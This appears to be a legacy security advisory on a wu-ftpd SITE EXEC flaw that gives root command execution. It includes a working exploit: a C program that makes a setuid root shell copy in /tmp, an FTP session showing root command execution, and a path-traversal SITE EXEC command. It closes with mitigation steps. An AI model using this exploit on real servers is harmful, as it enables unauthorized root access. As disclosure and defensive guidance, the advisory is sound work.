COMMAND

    wu.ftpd(8)

SYSTEMS AFFECTED

    Sites  running  wuarchive  ftpd  versions  prior to 2.3 or running
    "wrl" ftpd version ??

PROBLEM:

    wu-ftpd before version 2.3 has a  bug  in the "SITE EXEC"  command
    which allows  people to  run commands  in the  ftp server.  If the
    directory /bin/ftp-exec  exits *inside*  the anonymous  ftp chroot
    area,  the  attack  is  fairly  weak  -  you can get a shell owned
    inside the  ftp area.  This is  still a  pretty nasty attack since
    there is a change  you could use it  to upload trojans to  the ftp
    server.  However  if  you  have  a /bin/ftp-exec directory in your
    real outside filesystem, a hacker  can trivially get a root  shell
    on your machine by  telneting to the ftp  port and issuing a  SITE
    EXEC ../../../../bin/sh command! -  you issue this command  as the
    first  thing  you  do  after  telneting  to  the  port, before any
    attempt  to  log  in.  Thus  you  still  have  the root privileges
    of the ftp deamon itself. Nasty.

    Compile program :

        #include <stdio.h>
        #include <stdlib.h>
        #include <unistd.h>

        main()
        {
            seteuid (0);
            system ("cp /bin/sh /tmp/.sh");
            system ("chmod 6777 /tmp/.sh");
        }

    Login to the sistem :

        220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
        Name (exploitablesys:root): goodaccount
        331 Password required for goodaccount.
        Password: (password)
        230 User goodaccount logged in.
        Remote system type is UNIX.
        Using binary mode to transfer files.

    See if system is exploitable :

        ftp> quote "site exec bash -c id"
        200-bash -c id
        200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
        200  (end of 'bash -c id')

    Exploit system :

        ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
        200-bash -c /yer/home/dir/ftpbug
        200  (end of 'bash -c /yer/home/dir/ftpbug')
        ftp> quit
        221 Goodbye.

SOLUTION

    As an emergency measure remove the ftp-exec directory immediately,
    hack the source and remove the 'site exec' feature, add 'chmod  no
    anonymous'  and  'umask  no  anonymous'  to your ftpaccess file to
    stop outsiders  from uploading  executables, then  as soon  as you
    possible  can,  fetch  the  latest  version  of  wuarchive's ftpd.
    Upgrade to the lastest version.